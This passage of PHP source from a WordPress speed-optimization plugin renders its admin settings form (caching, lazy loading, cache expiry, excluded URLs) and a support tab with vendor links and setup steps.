            <form method="post" action="">
                <?php wp_nonce_field('SpeedupOptimization_save_settings', 'SpeedupOptimization_nonce'); ?>
                <table class="form-table">
                    <tr>
                        <th><label for="htmlonly">Cache HTML content only</label></th>
                        <td>
                            <select name="htmlonly" id="htmlonly" class="regular-text">
                                <?php
                                $list = array(
                                    0 => 'Disabled',
                                    1 => 'Enabled',
                                );
                                
                                foreach ($list as $value => $text) {
                                ?>
                                    <option value="<?php echo $value; ?>" <?php selected($settings['htmlonly'], $value); ?>><?php esc_html_e($text, 'SpeedupOptimization'); ?></option>
                                <?php
                                }
                                ?>
                            </select>
                            <p class="description"><?php esc_html_e('Enable caching for pages containing HTML content only. Static resources like CSS, JavaScript, and images will not be cached.', 'SpeedupOptimization'); ?></p>
                        </td>
                    </tr>
                    <tr>
                        <th><label for="lazyloading">Image Lazy Loading</label></th>
                        <td>
                            <select name="lazyloading" id="lazyloading" class="regular-text">
                                <?php
                                $list = array(
                                    0 => 'Disabled',
                                    1 => 'Enabled',
                                );
                                
                                foreach ($list as $value => $text) {
                                ?>
                                    <option value="<?php echo $value; ?>" <?php selected($settings['lazyloading'], $value); ?>><?php esc_html_e($text, 'SpeedupOptimization'); ?></option>
                                <?php
                                }
                                ?>
                            </select>
                            <p class="description"><?php esc_html_e('Turn on lazy loading to delay the loading of images until they are needed, improving page load speed and reducing bandwidth usage.', 'SpeedupOptimization'); ?></p>
                        </td>
                    </tr>
                    <tr>
                        <th><label for="exptime">Cache Expiration Time</label></th>
                        <td>
                            <select name="exptime" id="exptime" class="regular-text">
                                <?php
                                $list = array(
                                    0        => 'Never',
                                    60       => '1 hour',        // 1 hour = 60 mins
                                    360      => '6 hours',       // 6 hours = 360 mins
                                    720      => '12 hours',      // 12 hours = 720 mins
                                    1440     => '1 day',         // 1 day = 1440 mins
                                    10080    => '7 days',        // 7 days = 10080 mins
                                    20160    => '14 days',       // 14 days = 20160 mins
                                    43200    => '1 month',       // 30 days (avg month) = 43200 mins
                                    129600   => '3 months',      // 90 days = 129600 mins
                                    259200   => '6 months',      // 180 days = 259200 mins
                                    525600   => '1 year',        // 365 days = 525600 mins
                                );

                                foreach ($list as $value => $text) {
                                ?>
                                    <option value="<?php echo $value; ?>" <?php selected($settings['exptime'], $value); ?>><?php esc_html_e($text, 'SpeedupOptimization'); ?></option>
                                <?php
                                }
                                ?>
                            </select>
                            <p class="description"><?php esc_html_e('Set how long cached pages remain valid before they expire and refresh.', 'SpeedupOptimization'); ?></p>
                        </td>
                    </tr>
                    <tr>
                        <th><label for="exclude_urls">Exclude URLs from Cache</label></th>
                        <td>
                            <textarea name="exclude_urls" id="exclude_urls" rows="15" class="large-text"><?php echo esc_textarea(implode("\n", $settings['exclude_urls'])); ?></textarea>
                            <p class="description"><?php esc_html_e('Specify URLs that should be excluded from caching. Enter one URL per line.', 'SpeedupOptimization'); ?></p>
                        </td>
                    </tr>
                </table>
                <p class="submit">
                    <input type="submit" name="SpeedupOptimization_save_settings" class="button-primary" value="<?php esc_attr_e('Save Changes', 'SpeedupOptimization'); ?>">
                </p>
            </form>
            
        </div>
        <?php
    }
    
    public static function tab_Support() 
    {
        ?>
        <div id="support" class="tab-pane">
            <h2><?php esc_html_e('Support', 'SpeedupOptimization'); ?></h2>
            <p>
            <?php
            $link = speedup01_ServiceURL().'/livechat/index.html';
            ?>
        		<a href="<?php echo $link; ?>" target="_blank">
        			<img src="<?php echo plugins_url('images/livechat.png', __FILE__); ?>"/>
        		</a><br>
                <?php
                $link = speedup01_ServiceURL().'/en/contacts';
                ?>
        		For any questions and support please use LiveChat or this <a href="<?php echo $link; ?>" rel="nofollow" target="_blank">contact form</a>.<br>
        		<br>
        		<a href="<?php echo speedup01_ServiceURL(); ?>" target="_blank"><?php echo str_replace("y", "", 'ySyiytyyeGyyuyayrdyinyg.ycyom');; ?></a> - Website Security. Professional security services against hacker activity.<br>
    		</p>
            
            <hr />
            
            <h1>More tools and features</h1>
            
            <img style="width: 200px;" src="<?php echo plugins_url('images/img.svg', __FILE__); ?>"/>
            
            <hr />
            
            <h2>Step 1. Create your account on our platform.</h2>
            <?php
            $link = speedup01_ServiceURL().'/en/signup';
            ?>
            <p>To create the account click this link <a href="<?php echo $link; ?>" target="_blank"><?php echo $link; ?></a></p>
            
            <h2>Step 2. Add your website into panel.</h2>
            <p><b>Click "ADD NEW WEBSITE" button:</b><br /><br /><img class="help" src="<?php echo plugins_url('images/step1.png', __FILE__); ?>" /></p>
            <p><b>Enter your website URL:</b><br /><br /><img class="help" src="<?php echo plugins_url('images/step2.png', __FILE__); ?>" /></p>
            
            <h2>Step 3. Activate SpeedUp for your website.</h2>
            <p><b>Go to "Performance & Analytics" and click on airplane icon:</b><br /><br /><img class="help" src="<?php echo plugins_url('images/step3.png', __FILE__); ?>" /></p>
            <p><b>Activate Website Performance Optimization:</b><br /><br /><img class="help" src="<?php echo plugins_url('images/step4.png', __FILE__); ?>" /></p>
            <p><b>Manage SpeedUp in your WordPress dashboard:</b><br /><br /><img class="help" src="<?php echo plugins_url('images/step5.png', __FILE__); ?>" /></p>
            
            
        </div>
        <?php
    }

}